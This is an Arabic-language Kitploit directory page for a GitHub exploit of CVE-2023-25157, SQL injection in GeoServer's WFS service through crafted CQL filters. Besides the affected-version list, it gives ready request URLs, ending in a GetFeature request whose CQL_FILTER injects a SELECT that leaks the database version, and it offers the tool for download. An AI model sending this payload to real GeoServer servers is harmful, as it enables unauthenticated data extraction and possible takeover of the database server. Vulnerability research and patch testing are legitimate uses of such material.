Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-25157 — استغلال لـ CVE-2023-25157: حقن SQL في خدمة WFS الخاصة بـ GeoServer عبر صيغة مرشح CQL مصممة بعناية، مما يتيح استخراج البيانات عن بُعد دون مصادقة واحتمال اختراق خادم قاعدة البيانات. | Kitploit
أدوات/GitHubGitHub/charis3306/cve-2023-25157
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubcharis3306/cve-2023-25157

CVE-2023-25157

استغلال لـ CVE-2023-25157: حقن SQL في خدمة WFS الخاصة بـ GeoServer عبر صيغة مرشح CQL مصممة بعناية، مما يتيح استخراج البيانات عن بُعد دون مصادقة واحتمال اختراق خادم قاعدة البيانات.

عرض المستودع
31منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

وصف الثغرة

نظرًا لعدم تصفية إدخال المستخدم، يمكن للمهاجم غير المصرح له عن بعد بناء صيغة تصفية غير طبيعية، لتجاوز التحليل المعجمي لـ GeoServer مما يؤدي إلى حقن SQL، والحصول على معلومات حساسة من الخادم، وربما الحصول على صلاحيات خادم قاعدة البيانات.

الإصدارات المتأثرة

GeoServer 2.20.x < 2.20.7

GeoServer 2.19.x < 2.19.7

GeoServer 2.18.x < 2.18.7

GeoServer 2.21.x < 2.21.4

GeoServer 2.22.x < 2.22.2

إثبات المفهوم

الحصول على أسماء الوظائف المتاحة

بحث

root@kitploit:~
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

الحصول على الخصائص المتاحة للوظائف ذات الصلة

اسم الوظيفة vulhub:example للحصول على الخصائص ذات الصلة

root@kitploit:~
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

root@kitploit:~
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true

تنزيل الأداة